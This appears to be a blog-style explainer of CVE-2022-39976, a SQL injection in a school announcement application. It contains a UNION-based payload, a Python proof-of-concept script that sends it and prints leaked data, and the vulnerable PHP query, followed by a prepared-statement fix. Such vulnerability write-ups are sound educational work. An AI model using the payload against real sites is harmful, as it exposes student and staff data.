CVE-2022-39976 - Exploiting SQL Injection in School Activity Updates with SMS Notification v1.

In the world of educational technology, keeping sensitive student information safe is crucial. A vulnerability like CVE-2022-39976 shows how a simple mistake in web development can lead to serious risks, potentially exposing data or even compromising the school's server.

Discovered in "School Activity Updates with SMS Notification v1.," this CVE spotlights a SQL injection flaw found in the software's announcement editing feature. Let's break down what this means, how it can be exploited, and—importantly—how to fix it.

What is School Activity Updates with SMS Notification v1.?

This is a web application designed for schools. Its main function is to let staff manage and post announcements, sending SMS notifications to students and parents. Users log in, add announcements, and everyone stays updated—sounds great, right? But if there’s a security hole, the whole system is at risk.

The vulnerability affects requests made to

/modules/announcement/index.php?view=edit&id=

Original Disclosure

- Original NVD Entry (nvd.nist.gov)
- Exploit DB reference

How the Vulnerability Works

Insecure handling of user input is the root cause. When editing an announcement, the system calls this page:

http://<target>/modules/announcement/index.php?view=edit&id=1

The value of id is placed directly into an SQL statement without sanitization. That means a malicious user can inject SQL code.

(Imagine this is inside index.php)

<?php
$id = $_GET['id'];
$sql = "SELECT * FROM announcements WHERE id = $id";
$result = mysqli_query($conn, $sql);
// ... do something with $result ...
?>

Problem: $id comes straight from user input.

A hacker can change the id value to something malicious, like this

/modules/announcement/index.php?view=edit&id=1 UNION SELECT 1,2,version(),4-- -

What does this do?

Here’s a tiny Python script that automates the attack and reveals if the DB is vulnerable

import requests

target = "http://victim-site.com/modules/announcement/index.php";
payload = "1 UNION SELECT 1,2,version(),4-- -"
url = f"{target}?view=edit&id={payload}"

response = requests.get(url)
if "MySQL" in response.text or "MariaDB" in response.text:
    print("Vulnerable to SQL Injection!")
    print("Database info leaked:")
    print(response.text)
else:
    print("No injection evidence.")

Attackers can chain more payloads to dump usernames, passwords, or even gain shell access if more vulnerabilities exist.

Here’s a safe version

<?php
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM announcements WHERE id = ?");
$stmt->bind_param("i", $id); // "i" for integer
$stmt->execute();
$result = $stmt->get_result();
?>

Or, at least cast $id to an integer, but prepared statements are best!

Additional References

- Official NVD CVE-2022-39976
- Exploit Database #50935
- OWASP SQL Injection Overview

Final Thoughts

If you’re running School Activity Updates with SMS Notification v1., patch now or update your code. Even small or local systems can be a target. And always, always validate and sanitize any user input. One unsecured field is all it takes!

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 18:56:00 UTC